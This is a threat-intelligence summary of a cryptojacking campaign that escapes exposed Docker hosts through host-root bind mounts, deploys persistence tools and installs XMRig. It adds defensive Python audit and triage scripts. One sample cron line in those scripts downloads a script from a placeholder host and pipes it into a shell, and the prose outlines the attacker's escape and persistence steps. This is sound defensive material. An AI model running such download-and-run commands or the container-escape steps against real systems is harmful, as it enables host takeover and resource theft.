2024-07-11

Misconfigured Ports Continue to Plague Docker Instances, Enabling Container Host Escapes via Bind

Level: Tactical | Source: Datadog | Global

Misconfigurations in the cloud continue to lead to the compromise of insecure assets. Datadog security researcher Matt Muir provides insights into a new cryptojacking campaign attributed to threat actors associated with Spinning YARN, a campaign previously reported by Muir at Cado Security. This campaign, along with others such as Commando Cat, has seen attackers target exposed Docker instances and escape containers by bind-mounting the host's filesystem into them. These findings reinforce the necessity of securing cloud assets and detail the attackers' post-exploitation path from the exposed Docker container to the underlying host. The ultimate goal is to persist and deploy the XMRig cryptocurrency miner. Muir outlines an attack sequence that starts with scanning for hosts exposing Docker's default API port (2375) and continues with deploying an Alpine container that has the host's root directory bound into it, deploying payloads with shell scripts, and establishing persistence mechanisms. Through this access the attackers effectively escalate their privileges and execute arbitrary code on the host, illustrating the campaign's potential impact on affected systems.

The attack sequence begins by identifying vulnerable Docker hosts. Once the host's Docker API is confirmed to be accessible, the attackers deploy an Alpine Linux container configured with the host's root directory bind-mounted into a directory inside the container, which they then enter using the chroot shell utility. This gives them direct manipulation of the host's filesystem. Within this environment, the attackers execute a shell script that establishes persistent backdoors and facilitates further malicious activity, including modifying crontab entries to repeatedly execute malicious commands and download additional payloads, ensuring the attack persists. A key static indicator for a downloader utility was identified: the string 'zzhbot' used as the user-agent.
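The two preconditions described above (a Docker API reachable over plain TCP, and a container whose bind mount exposes the host's root directory) are both visible from the host side. The following added example, which is not Datadog's code and not part of the campaign, audits constructed sample data shaped like `/etc/docker/daemon.json` and `docker inspect` output. The weak daemon configuration is shown beside a TLS-verified one; the list of sensitive host paths and the heuristics are this example's own assumptions, not indicators from the article.

```python
"""Audit a Docker host for an exposed API and host-root bind mounts.

Added example, not the article's or Datadog's code. All inputs are
constructed samples; on a real host you would feed it the daemon.json
file and the output of `docker inspect $(docker ps -q)`.
"""
import json

# Constructed: the weak setting, API on TCP 2375 with no TLS client auth.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed: remote API only on 2376 with mutual TLS enforced.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Assumption: host paths that should never be bind-mounted into a workload.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock"}


def audit_daemon_config(raw_json):
    """Return findings for a daemon.json that listens on TCP without tlsverify."""
    cfg = json.loads(raw_json)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    findings = []
    if tcp_hosts and not cfg.get("tlsverify"):
        findings.append(
            f"API listens on {', '.join(tcp_hosts)} without tlsverify")
    return findings


def review_container(record):
    """Return reasons a single `docker inspect` record looks like a host escape."""
    reasons = []
    if record.get("HostConfig", {}).get("Privileged"):
        reasons.append("privileged container")
    for mount in record.get("Mounts", []):
        src = mount.get("Source", "")
        is_root = src.rstrip("/") == ""          # "/" or "//" etc.
        if mount.get("Type") == "bind" and (is_root or src in SENSITIVE_HOST_PATHS):
            reasons.append(
                f"bind mount of host {src!r} at {mount.get('Destination')}")
    cmd = record.get("Config", {}).get("Cmd") or []
    if "chroot" in cmd:
        reasons.append("command runs chroot")
    return reasons


def flag_containers(records):
    """Map container name -> reasons, for every record with at least one reason."""
    flagged = {}
    for rec in records:
        reasons = review_container(rec)
        if reasons:
            flagged[rec["Name"]] = reasons
    return flagged


# Constructed `docker inspect` records: one ordinary web container and one
# Alpine container with the host root mounted and entered via chroot, the
# shape the article describes.
SAMPLE_CONTAINERS = [
    {
        "Name": "/web",
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"],
                       "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/srv/www",
                    "Destination": "/usr/share/nginx/html"}],
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
    },
    {
        "Name": "/quirky_lamport",
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}],
        "Config": {"Image": "alpine", "Cmd": ["chroot", "/mnt", "/bin/sh"]},
    },
]

if __name__ == "__main__":
    print("weak daemon.json:", audit_daemon_config(WEAK_DAEMON_JSON))
    print("hardened daemon.json:", audit_daemon_config(HARDENED_DAEMON_JSON))
    for name, reasons in flag_containers(SAMPLE_CONTAINERS).items():
        print(name, "->", "; ".join(reasons))
```

One caveat when applying the hardened configuration: on systemd-based distributions the packaged `docker.service` already passes `-H fd://` on the command line, and a `hosts` key in `daemon.json` conflicts with it, so the listener is normally set in a unit drop-in instead. The container check is a triage aid, not proof of compromise; legitimate agents sometimes mount `/` read-only, so review flagged containers rather than acting on them automatically.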

Subsequently, the attack branches on user permissions: `ai.sh` for regular users or `ar.sh` for root. At the time of analysis, Muir observed that the `ai.sh` payload was no longer available, "making it likely that the attacker assumes the user will indeed be root." The `ar.sh` script performs a range of disruptive actions: it disables the host's firewall with systemctl commands, tampers with system logging by cleaning logs such as auth.log and boot.log, removes monitoring agents, and disables shell history by modifying the HISTCONTROL setting. A malicious binary named 'chkstart' is dropped and executed; it serves as a multifunctional tool providing remote access, payload execution, and additional malware downloads. The binary also checks whether the host is already infected so that it does not run the infection process twice.

Finally, 'chkstart' cements the attackers' foothold by establishing persistent backdoor access through systemd modifications, altering service files so that malicious binaries execute every time the service runs and the malware survives reboots. The compromised systems are then prepared for lateral movement within the network. SSH configuration is tampered with as `chkstart` adds an attacker-controlled SSH key to `/root/.ssh/authorized_keys` and `/root/.ssh/.ssh/zzhkeys`. Once persistence mechanisms are in place, the XMRig coinminer is deployed to hijack resources. Additionally, another notable payload, "exeremo," also written in Go, was examined: it facilitates lateral movement by running a series of commands that query bash_history and configuration files to identify usernames, hosts, SSH keys, and SSH commands, enabling the attackers to pivot to other systems.

Notably, `sd/httpd` and `fkoths` are additional tools used for scanning and anti-forensics. The fkoths tool impacts not only defenders but also other adversaries. It rewrites the Docker registry's hostname in /etc/hosts with an IP address, effectively blackholing it. This prevents other attackers from downloading their images or tools onto the system.
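The persistence and anti-forensics steps in the three paragraphs above (crontab download-and-run entries, systemd units that launch dropped binaries, an added key in `authorized_keys`, the non-standard `/root/.ssh/.ssh/zzhkeys` path, and the `/etc/hosts` rewrite that blackholes the Docker registry) each leave a file artifact a responder can check. The following added example, not the article's or Datadog's code, triages constructed sample file contents for those artifacts. The only indicator names it uses from the article are `chkstart`, `exeremo`, `fkoths`, `sd/httpd` and `zzhkeys`; the registry hostnames, the placeholder download host, the sample keys and the "suspicious directory" list are this example's own assumptions.

```python
"""Triage host artifacts for container-escape persistence.

Added example, not the article's or Datadog's code. Every input below is a
constructed sample; on a live host you would read the real files instead.
"""
import re

# Tool names from the article; everything else here is an assumption.
KNOWN_TOOL_NAMES = {"chkstart", "exeremo", "fkoths", "sd/httpd"}
SUSPICIOUS_EXEC_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
REGISTRY_HOSTS = {"registry-1.docker.io", "index.docker.io"}
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron(lines):
    """Cron entries that fetch something over HTTP and pipe it into a shell."""
    return [l for l in lines if DOWNLOAD_AND_RUN.search(l)]


def registry_overrides(hosts_lines):
    """/etc/hosts entries that pin a Docker registry hostname to any address."""
    hits = []
    for line in hosts_lines:
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and set(fields[1:]) & REGISTRY_HOSTS:
            hits.append(line)
    return hits


def unknown_authorized_keys(lines, known_blobs):
    """authorized_keys lines whose key blob is not in the admin inventory."""
    unknown = []
    for line in lines:
        parts = line.split()
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPES)), None)
        if idx is not None and idx + 1 < len(parts) and parts[idx + 1] not in known_blobs:
            unknown.append(line)
    return unknown


def suspicious_exec_start(unit_text):
    """ExecStart lines that run a known tool name or a binary from a scratch dir."""
    hits = []
    for line in unit_text.splitlines():
        if not line.startswith("ExecStart"):
            continue
        argv = line.split("=", 1)[1].strip().lstrip("-@:+!").split()
        exe = argv[0] if argv else ""
        if exe.startswith(SUSPICIOUS_EXEC_DIRS) or any(exe.endswith(n) for n in KNOWN_TOOL_NAMES):
            hits.append(line)
    return hits


def unexpected_ssh_paths(paths):
    """Key files outside the normal ~/.ssh layout, e.g. the nested .ssh/.ssh dir."""
    return [p for p in paths if "/.ssh/.ssh/" in p or p.endswith("zzhkeys")]


# Constructed samples (payload host is a placeholder, keys are not real).
CRON = [
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * wget -q -O- http://PAYLOAD-HOST-PLACEHOLDER/ar.sh | sh",
]
HOSTS = ["127.0.0.1 localhost", "10.0.0.5 build01", "0.0.0.0 registry-1.docker.io"]
KNOWN_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDADMINKEY0000000000000000000"}
AUTH_KEYS = [
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDADMINKEY0000000000000000000 admin@bastion",
    'command="/usr/bin/backup" ssh-rsa AAAAB3NzaC1yc2ECONSTRUCTEDUNKNOWNKEY unknown@nowhere',
]
UNIT = "[Unit]\nDescription=constructed sample\n[Service]\nExecStart=/usr/local/bin/chkstart\n"
PATHS = ["/root/.ssh/authorized_keys", "/root/.ssh/.ssh/zzhkeys"]


def triage():
    """Run every check over the constructed samples and return the findings."""
    return {
        "cron": suspicious_cron(CRON),
        "hosts": registry_overrides(HOSTS),
        "authorized_keys": unknown_authorized_keys(AUTH_KEYS, KNOWN_KEY_BLOBS),
        "systemd": suspicious_exec_start(UNIT),
        "ssh_paths": unexpected_ssh_paths(PATHS),
    }


if __name__ == "__main__":
    for check, hits in triage().items():
        print(f"{check}: {len(hits)} finding(s)")
        for h in hits:
            print("   ", h)
```

The registry check deliberately flags any `/etc/hosts` entry for a registry hostname rather than only loopback or `0.0.0.0`, because the article notes the tool rewrites the name to an IP address to blackhole it, and an arbitrary address would have the same effect. The `authorized_keys` check depends on an inventory of expected key blobs; without one, every key on the host must be reviewed by hand.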
